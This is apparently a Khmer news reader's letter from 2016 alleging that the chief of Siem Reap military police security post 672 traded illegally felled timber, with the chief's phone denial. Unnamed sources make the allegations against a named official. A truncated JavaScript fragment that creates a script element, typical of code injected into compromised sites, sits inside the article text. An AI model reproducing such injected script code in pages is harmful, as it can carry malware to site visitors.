លិខិតមិត្តអ្នកអាន៖ PMមេស្នាក់ការសន្តិសុខ៦៧២ រងការ រិះគន់ថា រកស៊ីដឹកឈើ ខុសច្បាប់

ខេត្តសៀមរាប៖ មានការ លើកឡើង ជាច្រើនថា មេស្នាក់ការ សន្តិសុខ ៦៧២ ចំណុះឲ្យ បញ្ជាការ កងរាជអាវុធហត្ថ ខេត្តសៀមរាបបានរកស៊ី ដឹកជញ្ជូនឈើ ដោយល្មើស ច្បាប់។ ប្រភពបាន ឲ្យដឹងថា ការរកស៊ី ដឹកឈើ របស់ មេស្នាក់ការ សន្តិសុខ ៦៧២ គឺបានដឹកចេញ ពីតំបន់ អណ្ដូង៣ ជាប់ព្រំ ប្រទល់ ខេត្តឧត្តមានជ័យ និងខេត្តសៀមរាប យកទៅលក់ ឲ្យដេប៉ូ មួយកន្លែង នៅផ្លូវក្រវ៉ាត់ ក្រុងសៀមរាប កាលពីថ្ងៃទី ១០សីហា ឆ្នាំ២០១៦ម្សិលមិញ តាមរយះរ៉ឺម៉ក ចំនួន២គ្រឿង ប្រភេទឈើ តាប់។

ប៉ុន្តែ ការលើកឡើង និងរិះគន់នេះ ត្រូវបាន លោកហេរ យែម ហៅដូ មេស្នាក់ការ សន្តិសុខ ៦៧២បានឆ្លើយតាម ទូរស័ព្ទថា ឈប់ហើយ គឺឆ្អឹងសល់ ពីការ ធ្វើពិដាន យកទៅឲ្យគេ ជ្រៀក នោះ !!! ឆ្អឹងពិដាន ធ្វើផ្ទះ នៅស្រែណូយ តើ !!! ចេះតែមាន ទៅឆែក មើលនៅផ្ទះមើល យកដីការ ទៅឆែកមើល ទៅសួដេប៉ូមើល!!! ។
យ៉ាងនេះ ក្ដីប្រភព បានអះអាងថា លោកដូរ បានដឹកឈើ ពីតំបន់ ខាងលើ ក្នុងភូមិសាស្ត្រ គ្រប់គ្រង របស់ខ្លួន យកមកទុកនៅ ផ្ទះរបស់ខ្លួន ហើយយករ៉ឺម៉ក ដឹកបន្តទៅលក់ ឲ្យដេប៉ូទិញឈើ។ ប្រភព បានបន្ថែមថា ក្នុងនោះ ក៍មាន មន្ត្រីPM ស្នាក់ការ សន្តិសុខ ៦៧២ រកស៊ីដឹកឈើ ដែរ។
ព័ត៌មាន ខាងលើនេះ សូមលោកឧត្តមសេនីយ៍ត្រី ប៉ោ វណ្ណនិត មេបញ្ជាការ កងរាជអាវុធហត្ថ ខេត្តសៀមរាប មេត្តាជ្រាបផង។var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More